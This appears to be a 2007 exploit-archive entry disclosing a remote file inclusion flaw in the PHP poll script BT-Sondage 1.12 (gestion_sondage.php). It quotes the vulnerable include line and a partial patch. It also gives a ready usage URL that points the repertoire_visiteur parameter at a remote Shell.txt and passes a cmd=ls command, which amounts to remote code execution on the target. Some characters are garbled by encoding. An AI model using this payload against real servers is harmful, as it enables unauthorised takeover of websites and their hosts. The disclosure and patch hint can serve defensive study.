[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BT-sondage 1.12 (gestion_sondage.php) RFI Vulnerability
# Published : 2007-04-01
# Author : Crackers_Child
# Previous Title : XOOPS Module eCal <= 2.24 (display.php) Remote SQL Injection Exploit
# Next Title : XOOPS Module Tiny Event <= 1.01 (id) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Title : BT-Sondage-v112 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: localexploit@hotmail.com
--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application : BT-Sondage
URL : http://www.phpscripts-fr.net/scripts/download.php?id=1575
--------------------------------------------------------------------------------
dork : Download Script :)
Exploit :
--------------------------------------------------------------------------------
Vulnerable Codes .n gestion_sondage.php
include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');
For Patch .t add
if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{
--------------------------------------------------------------------------------
Usage:
http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls
--------------------------------------------------------------------------------
greets: EveryBody :=)
--------------------------------------------------------------------------------
Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(
--------------------------------------------------------------------------------
# www.Syue.com [2007-04-01]